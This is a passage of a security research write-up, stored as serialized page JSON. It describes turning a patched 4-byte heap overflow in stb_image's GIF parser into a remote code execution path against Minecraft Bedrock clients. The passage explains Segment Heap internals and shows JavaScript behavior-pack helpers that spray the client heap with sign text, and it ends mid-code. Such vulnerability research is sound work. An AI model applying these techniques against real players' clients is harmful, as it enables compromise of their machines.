,153446,153450,153454],{"type":25,"tag":216,"props":153416,"children":153417},{"style":6973},[153418],{"type":31,"value":43250},{"type":25,"tag":216,"props":153420,"children":153421},{"style":6964},[153422],{"type":31,"value":7016},{"type":25,"tag":216,"props":153424,"children":153425},{"style":6953},[153426],{"type":31,"value":24581},{"type":25,"tag":216,"props":153428,"children":153429},{"style":7047},[153430],{"type":31,"value":153431},"stbi__gif_header",{"type":25,"tag":216,"props":153433,"children":153434},{"style":6964},[153435],{"type":31,"value":153436},"(s, g, comp,",{"type":25,"tag":216,"props":153438,"children":153439},{"style":6989},[153440],{"type":31,"value":1882},{"type":25,"tag":216,"props":153442,"children":153443},{"style":6964},[153444],{"type":31,"value":153445},"))     ",{"type":25,"tag":216,"props":153447,"children":153448},{"style":6973},[153449],{"type":31,"value":52426},{"type":25,"tag":216,"props":153451,"children":153452},{"style":6989},[153453],{"type":31,"value":6992},{"type":25,"tag":216,"props":153455,"children":153456},{"style":6964},[153457],{"type":31,"value":6967},{"type":25,"tag":216,"props":153459,"children":153460},{"class":6922,"line":7216},[153461,153466,153470,153474,153478,153483,153487,153491,153496,153500,153504,153508,153512,153516,153520,153524,153528,153532,153536],{"type":25,"tag":216,"props":153462,"children":153463},{"style":6947},[153464],{"type":31,"value":153465},"      g",{"type":25,"tag":216,"props":153467,"children":153468},{"style":6964},[153469],{"type":31,"value":17714},{"type":25,"tag":216,"props":153471,"children":153472},{"style":6947},[153473],{"type":31,"value":122657},{"type":25,"tag":216,"props":153475,"children":153476},{"style":6953},[153477],{"type":31,"value":6956},{"type":25,"tag":216,"props":153479,"children":153480},{"style":6964},[153481],{"type":31,"value":153482}," (stbi_uc ",{"type":25,"tag":216,"props":153484,"children":153485},{"style":6953},[153486],{"type":31,"value":8519},{"type":25,"tag":216,"props":153488,"children":153489},{"style":6964},[153490],{"type":31,"value":7036},{"type":25,"tag":216,"props":153492,"children":153493},{"style":7047},[153494],{"type":31,"value":153495},"stbi__malloc",{"type":25,"tag":216,"props":153497,"children":153498},{"style":6964},[153499],{"type":31,"value":1850},{"type":25,"tag":216,"props":153501,"children":153502},{"style":6989},[153503],{"type":31,"value":21486},{"type":25,"tag":216,"props":153505,"children":153506},{"style":6953},[153507],{"type":31,"value":13773},{"type":25,"tag":216,"props":153509,"children":153510},{"style":6947},[153511],{"type":31,"value":151878},{"type":25,"tag":216,"props":153513,"children":153514},{"style":6964},[153515],{"type":31,"value":17714},{"type":25,"tag":216,"props":153517,"children":153518},{"style":6947},[153519],{"type":31,"value":2470},{"type":25,"tag":216,"props":153521,"children":153522},{"style":6953},[153523],{"type":31,"value":13773},{"type":25,"tag":216,"props":153525,"children":153526},{"style":6947},[153527],{"type":31,"value":151878},{"type":25,"tag":216,"props":153529,"children":153530},{"style":6964},[153531],{"type":31,"value":17714},{"type":25,"tag":216,"props":153533,"children":153534},{"style":6947},[153535],{"type":31,"value":2611},{"type":25,"tag":216,"props":153537,"children":153538},{"style":6964},[153539],{"type":31,"value":7797},{"type":25,"tag":38,"props":153541,"children":153542},{},[153543,153545,153550,153552,153557],{"type":31,"value":153544},"And lastly, to figure out where the OOB bytes are written relative to the allocated buffer, we printed out the address range of ",{"type":25,"tag":82,"props":153546,"children":153548},{"className":153547},[],[153549],{"type":31,"value":152097},{"type":31,"value":153551}," and the value of ",{"type":25,"tag":82,"props":153553,"children":153555},{"className":153554},[],[153556],{"type":31,"value":38},{"type":31,"value":153558}," just before the OOB write happens:",{"type":25,"tag":206,"props":153560,"children":153562},{"code":153561},"g->out address range: [0x75d00d114800, 0x75d00d135800)\n[...]\np: 0x75d00d135800\n",[153563],{"type":25,"tag":82,"props":153564,"children":153565},{"__ignoreMap":7},[153566],{"type":31,"value":153561},{"type":25,"tag":38,"props":153568,"children":153569},{},[153570,153572,153577,153579,153584],{"type":31,"value":153571},"There are multiple within-bound writes to ",{"type":25,"tag":82,"props":153573,"children":153575},{"className":153574},[],[153576],{"type":31,"value":38},{"type":31,"value":153578},", but the last write happens just after the ",{"type":25,"tag":82,"props":153580,"children":153582},{"className":153581},[],[153583],{"type":31,"value":152097},{"type":31,"value":153585}," allocation.",{"type":25,"tag":606,"props":153587,"children":153589},{"id":153588},"summarizing-the-corruption",[153590],{"type":31,"value":153591},"Summarizing the Corruption",{"type":25,"tag":2039,"props":153593,"children":153594},{},[153595,153608,153636],{"type":25,"tag":2043,"props":153596,"children":153597},{},[153598,153600,153606],{"type":31,"value":153599},"A single ",{"type":25,"tag":82,"props":153601,"children":153603},{"className":153602},[],[153604],{"type":31,"value":153605},"0x01",{"type":31,"value":153607}," byte write OOB",{"type":25,"tag":2043,"props":153609,"children":153610},{},[153611,153613],{"type":31,"value":153612},"4-byte OOB write just above the allocated buffer\n",{"type":25,"tag":2039,"props":153614,"children":153615},{},[153616,153621,153631],{"type":25,"tag":2043,"props":153617,"children":153618},{},[153619],{"type":31,"value":153620},"First three bytes are controllable",{"type":25,"tag":2043,"props":153622,"children":153623},{},[153624,153626],{"type":31,"value":153625},"Last byte will be ",{"type":25,"tag":82,"props":153627,"children":153629},{"className":153628},[],[153630],{"type":31,"value":117286},{"type":25,"tag":2043,"props":153632,"children":153633},{},[153634],{"type":31,"value":153635},"Size of the allocation is controlled",{"type":25,"tag":2043,"props":153637,"children":153638},{},[153639,153641],{"type":31,"value":153640},"Both corruptions are done on a short-lived allocation\n",{"type":25,"tag":2039,"props":153642,"children":153643},{},[153644,153649],{"type":25,"tag":2043,"props":153645,"children":153646},{},[153647],{"type":31,"value":153648},"Allocated just before the image-parsing process",{"type":25,"tag":2043,"props":153650,"children":153651},{},[153652],{"type":31,"value":153653},"Freed immediately upon parsing completion",{"type":25,"tag":22753,"props":153655,"children":153656},{},[],{"type":25,"tag":38,"props":153658,"children":153659},{},[153660,153662,153669,153671,153678],{"type":31,"value":153661},"Note that this bug was already found before (",{"type":25,"tag":162,"props":153663,"children":153666},{"href":153664,"rel":153665},"https://github.com/nothings/stb/issues/656",[166],[153667],{"type":31,"value":153668},"Github Issue",{"type":31,"value":153670},") but we missed it at the time. It was later fixed in ",{"type":25,"tag":162,"props":153672,"children":153675},{"href":153673,"rel":153674},"https://github.com/nothings/stb/commit/50b1bfba583b12ceb23ef949567bdd914461e524",[166],[153676],{"type":31,"value":153677},"this commit",{"type":31,"value":179},{"type":25,"tag":26,"props":153680,"children":153681},{"id":9370},[153682],{"type":31,"value":9373},{"type":25,"tag":38,"props":153684,"children":153685},{},[153686],{"type":31,"value":153687},"The memory corruption we had wasn't the easiest to exploit, especially on a remote target with ASLR, but it was the only one we had. We could've looked for another bug for information leaks but that wasn't interesting enough - we wanted to see if we can get RCE from the 4-byte memory corruption alone.",{"type":25,"tag":38,"props":153689,"children":153690},{},[153691],{"type":31,"value":153692},"Obviously four bytes alone aren't enough to get remote code execution in this case, so we looked for ways to turn the overflow into stronger primitives.",{"type":25,"tag":606,"props":153694,"children":153696},{"id":153695},"searching-for-better-primitives",[153697],{"type":31,"value":153698},"Searching for Better Primitives",{"type":25,"tag":38,"props":153700,"children":153701},{},[153702],{"type":31,"value":153703},"The initial idea was to use the 4‑byte OOB to overflow into adjacent heap chunk headers and attack the allocator, but we weren't familiar with Windows allocator internals at the time, so we started investigating.",{"type":25,"tag":38,"props":153705,"children":153706},{},[153707,153709,153716],{"type":31,"value":153708},"We realized that Minecraft uses the Segment Heap - Microsoft's newer heap implementation that is used by the kernel and is the default for packaged / ",{"type":25,"tag":162,"props":153710,"children":153713},{"href":153711,"rel":153712},"https://learn.microsoft.com/en-us/windows/uwp/get-started/universal-application-platform-guide",[166],[153714],{"type":31,"value":153715},"UWP",{"type":31,"value":153717}," applications (such as Minecraft Bedrock Edition).",{"type":25,"tag":606,"props":153719,"children":153721},{"id":153720},"segment-heap",[153722],{"type":31,"value":153723},"Segment Heap",{"type":25,"tag":38,"props":153725,"children":153726},{},[153727,153729,153736],{"type":31,"value":153728},"The internals of this heap implementation have been explored a number of times before (for an example in ",{"type":25,"tag":162,"props":153730,"children":153733},{"href":153731,"rel":153732},"https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Windows-Heap-Backed-Pool-The-Good-The-Bad-And-The-Encoded.pdf",[166],[153734],{"type":31,"value":153735},"this talk",{"type":31,"value":153737}," by Yarden Shafir), so we'll just summarize the two subsegment types relevant to this writeup.",{"type":25,"tag":630,"props":153739,"children":153741},{"id":153740},"low-fragmentation-heap",[153742],{"type":31,"value":153743},"Low Fragmentation Heap",{"type":25,"tag":38,"props":153745,"children":153746},{},[153747,153749,153755],{"type":31,"value":153748},"Low Fragmentation Heap (LFH) services allocations of ",{"type":25,"tag":82,"props":153750,"children":153752},{"className":153751},[],[153753],{"type":31,"value":153754},"0x3ff0",{"type":31,"value":153756}," bytes or less when LFH for that size is enabled. LFH for a given size becomes enabled after 17 consecutive allocations of that size.",{"type":25,"tag":38,"props":153758,"children":153759},{},[153760],{"type":31,"value":153761},"Most importantly for us, chunks allocated in this subsegment do not have per‑chunk headers, and data from two adjacent chunks in LFH is not separated by allocator metadata.",{"type":25,"tag":206,"props":153763,"children":153765},{"code":153764},"              +-------------------------+\nChunk A ----->| 41 41 41 41 41 41 41 41 |\n              |                         |\n              | 41 41 41 41 41 41 41 41 |\n              |                         |\n              | 41 41 41 41 41 41 41 41 |\n              |                         |\n              | 41 41 41 41 41 41 41 41 |\n              +-------------------------+\nChunk B ----->| 42 42 42 42 42 42 42 42 |\n              |                         |\n              | 42 42 42 42 42 42 42 42 |\n              |                         |\n              | 42 42 42 42 42 42 . . . |\n              |                         |\n",[153766],{"type":25,"tag":82,"props":153767,"children":153768},{"__ignoreMap":7},[153769],{"type":31,"value":153764},{"type":25,"tag":38,"props":153771,"children":153772},{},[153773],{"type":31,"value":153774},"This means that the 4‑byte OOB write could overwrite the first four bytes of the next chunk above, allowing us to target heap‑allocated internal structures in Minecraft instead of the allocator - the idea being that we could find a structure that has the first field either a reference count or a length field (for example) which we could directly corrupt with the overflow.",{"type":25,"tag":630,"props":153776,"children":153778},{"id":153777},"variable-size",[153779],{"type":31,"value":153780},"Variable Size",{"type":25,"tag":38,"props":153782,"children":153783},{},[153784,153786,153792,153794,153800],{"type":31,"value":153785},"This subsegment is used for allocation sizes from ",{"type":25,"tag":82,"props":153787,"children":153789},{"className":153788},[],[153790],{"type":31,"value":153791},"0x4000",{"type":31,"value":153793}," and up to ",{"type":25,"tag":82,"props":153795,"children":153797},{"className":153796},[],[153798],{"type":31,"value":153799},"0x20_000",{"type":31,"value":153801},". Unlike LFH, the allocator will store chunk metadata in the headers of the allocated block.",{"type":25,"tag":206,"props":153803,"children":153805},{"code":153804},"                          +-------------------------+\n            Chunk A ----->|  HEAP_VS_CHUNK_HEADER   |\n                          +-------------------------+\nChunk A Data ------------>| 41 41 41 41 41 41 41 41 |\n                          |                         |\n                          | 41 41 41 41 41 41 41 41 |\n                          |                         |\n                          | 41 41 41 41 41 41 41 41 |\n                          +-------------------------+\n            Chunk B ----->|  HEAP_VS_CHUNK_HEADER   |\n                          +-------------------------+\nChunk B Data ------------>| 42 42 42 42 42 42 42 42 |\n                          |                         |\n                          | 42 42 42 42 42 42 42 42 |\n                          |                         |\n                          | 42 42 42 42 42 42 . . . |\n                          |                         |\n",[153806],{"type":25,"tag":82,"props":153807,"children":153808},{"__ignoreMap":7},[153809],{"type":31,"value":153804},{"type":25,"tag":38,"props":153811,"children":153812},{},[153813,153815,153821],{"type":31,"value":153814},"The header, ",{"type":25,"tag":82,"props":153816,"children":153818},{"className":153817},[],[153819],{"type":31,"value":153820},"HEAP_VS_CHUNK_HEADER",{"type":31,"value":153822},", contains information such as block size and allocation status. Crucially, this header is XORed with a secret heap key. That encoding means that, unless the heap key is leaked, faking a chunk header with an overflow is not deterministic.",{"type":25,"tag":22753,"props":153824,"children":153825},{},[],{"type":25,"tag":38,"props":153827,"children":153828},{},[153829],{"type":31,"value":153830},"At this point there were two paths to explore: use the 4‑byte overflow in LFH to target Minecraft structures, or use the overflow in VS to target the allocator.",{"type":25,"tag":38,"props":153832,"children":153833},{},[153834,153836,153843],{"type":31,"value":153835},"Targeting the allocator looked difficult because the VS chunk header is encoded. Fortunately, a ",{"type":25,"tag":162,"props":153837,"children":153840},{"href":153838,"rel":153839},"https://web.archive.org/web/20250117163016/https://labs.bluefrostsecurity.de/blog.html/2022/08/16/windows-segment-heap-attacking-the-vs-allocator/",[166],[153841],{"type":31,"value":153842},"technique published",{"type":31,"value":153844}," by Blue Frost Security describes how to abuse a 3–4 byte overflow in the VS heap to reliably produce overlapping chunks.",{"type":25,"tag":38,"props":153846,"children":153847},{},[153848],{"type":31,"value":153849},"To target Minecraft structures in LFH, we needed to find a heap‑allocated object whose first field could be forged with four bytes (or less) - candidates included a reference counter or a length field. Overwriting such a field could yield a useful primitive (e.g., a use‑after‑free from a corrupted refcount, or a larger overflow / OOB read by corrupting a length field).",{"type":25,"tag":38,"props":153851,"children":153852},{},[153853],{"type":31,"value":153854},"In either case, we needed a way to spray the heap before we could proceed.",{"type":25,"tag":606,"props":153856,"children":153858},{"id":153857},"finding-a-way-to-spray-the-heap",[153859],{"type":31,"value":153860},"Finding a Way to Spray the Heap",{"type":25,"tag":38,"props":153862,"children":153863},{},[153864],{"type":31,"value":153865},"We needed to find an object that the client allocates in response to a server-controlled action. Ideally, the server would be able to control:",{"type":25,"tag":2039,"props":153867,"children":153868},{},[153869,153874,153879,153884],{"type":25,"tag":2043,"props":153870,"children":153871},{},[153872],{"type":31,"value":153873},"The size of the allocation",{"type":25,"tag":2043,"props":153875,"children":153876},{},[153877],{"type":31,"value":153878},"The data written into the allocated buffer",{"type":25,"tag":2043,"props":153880,"children":153881},{},[153882],{"type":31,"value":153883},"The allocation’s lifetime (i.e., allocated and freed through different server actions)",{"type":25,"tag":2043,"props":153885,"children":153886},{},[153887],{"type":31,"value":153888},"The number of created objects (preferably unbounded)",{"type":25,"tag":38,"props":153890,"children":153891},{},[153892],{"type":31,"value":153893},"Not all of these conditions are strictly required, but an object satisfying all of them would be perfect for heap spraying. Eventually, we found exactly what we were looking for.",{"type":25,"tag":630,"props":153895,"children":153897},{"id":153896},"minecraft-signs",[153898],{"type":31,"value":153899},"Minecraft Signs",{"type":25,"tag":38,"props":153901,"children":153902},{},[153903],{"type":31,"value":153904},"A sign is a block in Minecraft that can display arbitrary text. There is effectively no limit to how many signs can exist in a world (aside from resource constraints), and their lifetime is fully controllable: creating a sign results in an allocation, and removing it frees the associated memory.",{"type":25,"tag":38,"props":153906,"children":153907},{},[153908,153910,153916],{"type":31,"value":153909},"What we were specifically interested in was how the client stores the text displayed on a sign. After reversing the client, we found that the text is stored in a ",{"type":25,"tag":82,"props":153911,"children":153913},{"className":153912},[],[153914],{"type":31,"value":153915},"std::string",{"type":31,"value":179},{"type":25,"tag":38,"props":153918,"children":153919},{},[153920,153922,153927],{"type":31,"value":153921},"In Microsoft’s C++ implementation, ",{"type":25,"tag":82,"props":153923,"children":153925},{"className":153924},[],[153926],{"type":31,"value":153915},{"type":31,"value":153928}," is structured roughly as follows:",{"type":25,"tag":206,"props":153930,"children":153932},{"code":153931,"language":2254,"meta":7,"className":20473,"style":7},"struct string\n{\n    union {\n        char* ptr;\n        char buf[16];\n    };\n    size_t size;\n    size_t capacity;\n};\n",[153933],{"type":25,"tag":82,"props":153934,"children":153935},{"__ignoreMap":7},[153936,153947,153954,153966,153982,154006,154013,154024,154036],{"type":25,"tag":216,"props":153937,"children":153938},{"class":6922,"line":6923},[153939,153943],{"type":25,"tag":216,"props":153940,"children":153941},{"style":6936},[153942],{"type":31,"value":13357},{"type":25,"tag":216,"props":153944,"children":153945},{"style":6964},[153946],{"type":31,"value":89015},{"type":25,"tag":216,"props":153948,"children":153949},{"class":6922,"line":6769},[153950],{"type":25,"tag":216,"props":153951,"children":153952},{"style":6964},[153953],{"type":31,"value":14836},{"type":25,"tag":216,"props":153955,"children":153956},{"class":6922,"line":6778},[153957,153962],{"type":25,"tag":216,"props":153958,"children":153959},{"style":6936},[153960],{"type":31,"value":153961},"    union",{"type":25,"tag":216,"props":153963,"children":153964},{"style":6964},[153965],{"type":31,"value":7241},{"type":25,"tag":216,"props":153967,"children":153968},{"class":6922,"line":7005},[153969,153974,153978],{"type":25,"tag":216,"props":153970,"children":153971},{"style":6936},[153972],{"type":31,"value":153973},"        char",{"type":25,"tag":216,"props":153975,"children":153976},{"style":6953},[153977],{"type":31,"value":8519},{"type":25,"tag":216,"props":153979,"children":153980},{"style":6964},[153981],{"type":31,"value":20515},{"type":25,"tag":216,"props":153983,"children":153984},{"class":6922,"line":7110},[153985,153989,153994,153998,154002],{"type":25,"tag":216,"props":153986,"children":153987},{"style":6936},[153988],{"type":31,"value":153973},{"type":25,"tag":216,"props":153990,"children":153991},{"style":6947},[153992],{"type":31,"value":153993}," buf",{"type":25,"tag":216,"props":153995,"children":153996},{"style":6964},[153997],{"type":31,"value":7701},{"type":25,"tag":216,"props":153999,"children":154000},{"style":6989},[154001],{"type":31,"value":44811},{"type":25,"tag":216,"props":154003,"children":154004},{"style":6964},[154005],{"type":31,"value":35536},{"type":25,"tag":216,"props":154007,"children":154008},{"class":6922,"line":7216},[154009],{"type":25,"tag":216,"props":154010,"children":154011},{"style":6964},[154012],{"type":31,"value":42960},{"type":25,"tag":216,"props":154014,"children":154015},{"class":6922,"line":7244},[154016,154020],{"type":25,"tag":216,"props":154017,"children":154018},{"style":6936},[154019],{"type":31,"value":20523},{"type":25,"tag":216,"props":154021,"children":154022},{"style":6964},[154023],{"type":31,"value":128534},{"type":25,"tag":216,"props":154025,"children":154026},{"class":6922,"line":7257},[154027,154031],{"type":25,"tag":216,"props":154028,"children":154029},{"style":6936},[154030],{"type":31,"value":20523},{"type":25,"tag":216,"props":154032,"children":154033},{"style":6964},[154034],{"type":31,"value":154035}," capacity;\n",{"type":25,"tag":216,"props":154037,"children":154038},{"class":6922,"line":7275},[154039],{"type":25,"tag":216,"props":154040,"children":154041},{"style":6964},[154042],{"type":31,"value":20536},{"type":25,"tag":38,"props":154044,"children":154045},{},[154046,154048,154054,154056,154061],{"type":31,"value":154047},"We are primarily interested in the union: ",{"type":25,"tag":82,"props":154049,"children":154051},{"className":154050},[],[154052],{"type":31,"value":154053},"buf",{"type":31,"value":154055}," is used when the string fits within 16 bytes, while ",{"type":25,"tag":82,"props":154057,"children":154059},{"className":154058},[],[154060],{"type":31,"value":17906},{"type":31,"value":154062}," points to a heap-allocated buffer if the string exceeds that size. The allocated buffer contains only the string’s raw bytes.",{"type":25,"tag":38,"props":154064,"children":154065},{},[154066],{"type":31,"value":154067},"This means that for each sign whose text is longer than 16 bytes, the client allocates a heap buffer equal to the string length.",{"type":25,"tag":38,"props":154069,"children":154070},{},[154071],{"type":31,"value":154072},"This makes signs perfect for our needs - we can fully control the allocation size, lifetime, and contents of the heap buffer.",{"type":25,"tag":630,"props":154074,"children":154076},{"id":154075},"spraying-with-server-side-scripting",[154077],{"type":31,"value":154078},"Spraying With Server-Side Scripting",{"type":25,"tag":38,"props":154080,"children":154081},{},[154082],{"type":31,"value":154083},"The simplest way to automatically manipulate the world is through server-side behavior packs. These packs are written in JavaScript and can control many aspects of the server.",{"type":25,"tag":38,"props":154085,"children":154086},{},[154087,154089,154095,154096,154102],{"type":31,"value":154088},"We wrote ",{"type":25,"tag":82,"props":154090,"children":154092},{"className":154091},[],[154093],{"type":31,"value":154094},"alloc",{"type":31,"value":1307},{"type":25,"tag":82,"props":154097,"children":154099},{"className":154098},[],[154100],{"type":31,"value":154101},"free",{"type":31,"value":154103}," helpers that trigger an allocation in the client and free it on demand:",{"type":25,"tag":206,"props":154105,"children":154107},{"code":154106,"language":39578,"meta":7,"className":39576,"style":7},"// Allocate sign text in the client\nfunction alloc(size, fill=\"A\") {\n    for (let sign of signs) {\n        if (sign.allocated || sign.removed) {\n            continue;\n        }\n\n        sign.sign.setText(fill.repeat(size - 1));\n        sign.allocated = true;\n        return sign;\n    }\n\n    console.warn(\"No more allocs\");\n    return undefined;\n}\n\n// Free an allocated sign in the client\nfunction free(sign) {\n    if (sign == undefined || sign.allocated == false) {\n        return;\n    }\n\n    sign.sign.setText(\"\");\n    sign.allocated = false;\n\n    sign.block.setPermutation(\n        BlockPermutation.resolve(\"minecraft:air\")\n    );\n    sign.removed = true;\n}\n",[154108],{"type":25,"tag":82,"props":154109,"children":154110},{"__ignoreMap":7},[154111,154119,154161,154194,154239,154251,154258,154265,154326,154353,154368,154375,154382,154411,154426,154433,154440,154448,154472,154523,154534,154541,154548,154585,154612,154619,154648,154678,154685,154712],{"type":25,"tag":216,"props":154112,"children":154113},{"class":6922,"line":6923},[154114],{"type":25,"tag":216,"props":154115,"children":154116},{"style":6927},[154117],{"type":31,"value":154118},"// Allocate sign text in the client\n",{"type":25,"tag":216,"props":154120,"children":154121},{"class":6922,"line":6769},[154122,154126,154131,154135,154139,154143,154148,154152,154157],{"type":25,"tag":216,"props":154123,"children":154124},{"style":6936},[154125],{"type":31,"value":35339},{"type":25,"tag":216,"props":154127,"children":154128},{"style":7047},[154129],{"type":31,"value":154130}," alloc",{"type":25,"tag":216,"props":154132,"children":154133},{"style":6964},[154134],{"type":31,"value":1850},{"type":25,"tag":216,"props":154136,"children":154137},{"style":6947},[154138],{"type":31,"value":128192},{"type":25,"tag":216,"props":154140,"children":154141},{"style":6964},[154142],{"type":31,"value":7026},{"type":25,"tag":216,"props":154144,"children":154145},{"style":6947},[154146],{"type":31,"value":154147},"fill",{"type":25,"tag":216,"props":154149,"children":154150},{"style":6953},[154151],{"type":31,"value":266},{"type":25,"tag":216,"props":154153,"children":154154},{"style":8205},[154155],{"type":31,"value":154156},"\"A\"",{"type":25,"tag":216,"props":154158,"children":154159},{"style":6964},[154160],{"type":31,"value":18761},{"type":25,"tag":216,"props":154162,"children":154163},{"class":6922,"line":6778},[154164,154168,154172,154176,154181,154185,154190],{"type":25,"tag":216,"props":154165,"children":154166},{"style":6973},[154167],{"type":31,"value":6976},{"type":25,"tag":216,"props":154169,"children":154170},{"style":6964},[154171],{"type":31,"value":7016},{"type":25,"tag":216,"props":154173,"children":154174},{"style":6936},[154175],{"type":31,"value":15743},{"type":25,"tag":216,"props":154177,"children":154178},{"style":6947},[154179],{"type":31,"value":154180}," sign",{"type":25,"tag":216,"props":154182,"children":154183},{"style":6936},[154184],{"type":31,"value":14320},{"type":25,"tag":216,"props":154186,"children":154187},{"style":6947},[154188],{"type":31,"value":154189}," signs",{"type":25,"tag":216,"props":154191,"children":154192},{"style":6964},[154193],{"type":31,"value":18761},{"type":25,"tag":216,"props":154195,"children":154196},{"class":6922,"line":7005},[154197,154201,154205,154210,154214,154219,154223,154227,154231,154235],{"type":25,"tag":216,"props":154198,"children":154199},{"style":6973},[154200],{"type":31,"value":7222},{"type":25,"tag":216,"props":154202,"children":154203},{"style":6964},[154204],{"type":31,"value":7016},{"type":25,"tag":216,"props":154206,"children":154207},{"style":6947},[154208],{"type":31,"value":154209},"sign",{"type":25,"tag":216,"props":154211,"children":154212},{"style":6964},[154213],{"type":31,"value":179},{"type":25,"tag":216,"props":154215,"children":154216},{"style":6947},[154217],{"type":31,"value":154218},"allocated",{"type":25,"tag":216,"props":154220,"children":154221},{"style":6953},[154222],{"type":31,"value":27654},{"type":25,"tag":216,"props":154224,"children":154225},{"style":6947},[154226],{"type":31,"value":154180},{"type":25,"tag":216,"props":154228,"children":154229},{"style":6964},[154230],{"type":31,"value":179},{"type":25,"tag":216,"props":154232,"children":154233},{"style":6947},[154234],{"type":31,"value":136897},{"type":25,"tag":216,"props":154236,"children":154237},{"style":6964},[154238],{"type":31,"value":18761},{"type":25,"tag":216,"props":154240,"children":154241},{"class":6922,"line":7110},[154242,154247],{"type":25,"tag":216,"props":154243,"children":154244},{"style":6973},[154245],{"type":31,"value":154246},"            continue",{"type":25,"tag":216,"props":154248,"children":154249},{"style":6964},[154250],{"type":31,"value":6967},{"type":25,"tag":216,"props":154252,"children":154253},{"class":6922,"line":7216},[154254],{"type":25,"tag":216,"props":154255,"children":154256},{"style":6964},[154257],{"type":31,"value":7302},{"type":25,"tag":216,"props":154259,"children":154260},{"class":6922,"line":7244},[154261],{"type":25,"tag":216,"props":154262,"children":154263},{"emptyLinePlaceholder":16},[154264],{"type":31,"value":7642},{"type":25,"tag":216,"props":154266,"children":154267},{"class":6922,"line":7257},[154268,154273,154277,154281,154285,154290,154294,154298,154302,154306,154310,154314,154318,154322],{"type":25,"tag":216,"props":154269,"children":154270},{"style":6947},[154271],{"type":31,"value":154272},"        sign",{"type":25,"tag":216,"props":154274,"children":154275},{"style":6964},[154276],{"type":31,"value":179},{"type":25,"tag":216,"props":154278,"children":154279},{"style":6947},[154280],{"type":31,"value":154209},{"type":25,"tag":216,"props":154282,"children":154283},{"style":6964},[154284],{"type":31,"value":179},{"type":25,"tag":216,"props":154286,"children":154287},{"style":7047},[154288],{"type":31,"value":154289},"setText",{"type":25,"tag":216,"props":154291,"children":154292},{"style":6964},[154293],{"type":31,"value":1850},{"type":25,"tag":216,"props":154295,"children":154296},{"style":6947},[154297],{"type":31,"value":154147},{"type":25,"tag":216,"props":154299,"children":154300},{"style":6964},[154301],{"type":31,"value":179},{"type":25,"tag":216,"props":154303,"children":154304},{"style":7047},[154305],{"type":31,"value":137147},{"type":25,"tag":216,"props":154307,"children":154308},{"style":6964},[154309],{"type":31,"value":1850},{"type":25,"tag":216,"props":154311,"children":154312},{"style":6947},[154313],{"type":31,"value":128192},{"type":25,"tag":216,"props":154315,"children":154316},{"style":6953},[154317],{"type":31,"value":55224},{"type":25,"tag":216,"props":154319,"children":154320},{"style":6989},[154321],{"type":31,"value":8471},{"type":25,"tag":216,"props":154323,"children":154324},{"style":6964},[154325],{"type":31,"value":11175},{"type":25,"tag":216,"props":154327,"children":154328},{"class":6922,"line":7275},[154329,154333,154337,154341,154345,154349],{"type":25,"tag":216,"props":154330,"children":154331},{"style":6947},[154332],{"type":31,"value":154272},{"type":25,"tag":216,"props":154334,"children":154335},{"style":6964},[154336],{"type":31,"value":179},{"type":25,"tag":216,"props":154338,"children":154339},{"style":6947},[154340],{"type":31,"value":154218},{"type":25,"tag":216,"props":154342,"children":154343},{"style":6953},[154344],{"type":31,"value":6956},{"type":25,"tag":216,"props":154346,"children":154347},{"style":6936},[154348],{"type":31,"value":16425},{"type":25,"tag":216,"props":154350,"children":154351},{"style":6964},[154352],{"type":31,"value":6967},{"type":25,"tag":216,"props":154354,"children":154355},{"class":6922,"line":7296},[154356,154360,154364],{"type":25,"tag":216,"props":154357,"children":154358},{"style":6973},[154359],{"type":31,"value":19702},{"type":25,"tag":216,"props":154361,"children":154362},{"style":6947},[154363],{"type":31,"value":154180},{"type":25,"tag":216,"props":154365,"children":154366},{"style":6964},[154367],{"type":31,"value":6967},{"type":25,"tag":216,"props":154369,"children":154370},{"class":6922,"line":7305},[154371],{"type":25,"tag":216,"props":154372,"children":154373},{"style":6964},[154374],{"type":31,"value":7311},{"type":25,"tag":216,"props":154376,"children":154377},{"class":6922,"line":7557},[154378],{"type":25,"tag":216,"props":154379,"children":154380},{"emptyLinePlaceholder":16},[154381],{"type":31,"value":7642},{"type":25,"tag":216,"props":154383,"children":154384},{"class":6922,"line":7574},[154385,154389,154393,154398,154402,154407],{"type":25,"tag":216,"props":154386,"children":154387},{"style":6947},[154388],{"type":31,"value":35401},{"type":25,"tag":216,"props":154390,"children":154391},{"style":6964},[154392],{"type":31,"value":179},{"type":25,"tag":216,"props":154394,"children":154395},{"style":7047},[154396],{"type":31,"value":154397},"warn",{"type":25,"tag":216,"props":154399,"children":154400},{"style":6964},[154401],{"type":31,"value":1850},{"type":25,"tag":216,"props":154403,"children":154404},{"style":8205},[154405],{"type":31,"value":154406},"\"No more allocs\"",{"type":25,"tag":216,"props":154408,"children":154409},{"style":6964},[154410],{"type":31,"value":7797},{"type":25,"tag":216,"props":154412,"children":154413},{"class":6922,"line":7591},[154414,154418,154422],{"type":25,"tag":216,"props":154415,"children":154416},{"style":6973},[154417],{"type":31,"value":20947},{"type":25,"tag":216,"props":154419,"children":154420},{"style":6936},[154421],{"type":31,"value":43301},{"type":25,"tag":216,"props":154423,"children":154424},{"style":6964},[154425],{"type":31,"value":6967},{"type":25,"tag":216,"props":154427,"children":154428},{"class":6922,"line":7604},[154429],{"type":25,"tag":216,"props":154430,"children":154431},{"style":6964},[154432],{"type":31,"value":7874},{"type":25,"tag":216,"props":154434,"children":154435},{"class":6922,"line":7613},[154436],{"type":25,"tag":216,"props":154437,"children":154438},{"emptyLinePlaceholder":16},[154439],{"type":31,"value":7642},{"type":25,"tag":216,"props":154441,"children":154442},{"class":6922,"line":7636},[154443],{"type":25,"tag":216,"props":154444,"children":154445},{"style":6927},[154446],{"type":31,"value":154447},"// Free an allocated sign in the client\n",{"type":25,"tag":216,"props":154449,"children":154450},{"class":6922,"line":7645},[154451,154455,154460,154464,154468],{"type":25,"tag":216,"props":154452,"children":154453},{"style":6936},[154454],{"type":31,"value":35339},{"type":25,"tag":216,"props":154456,"children":154457},{"style":7047},[154458],{"type":31,"value":154459}," 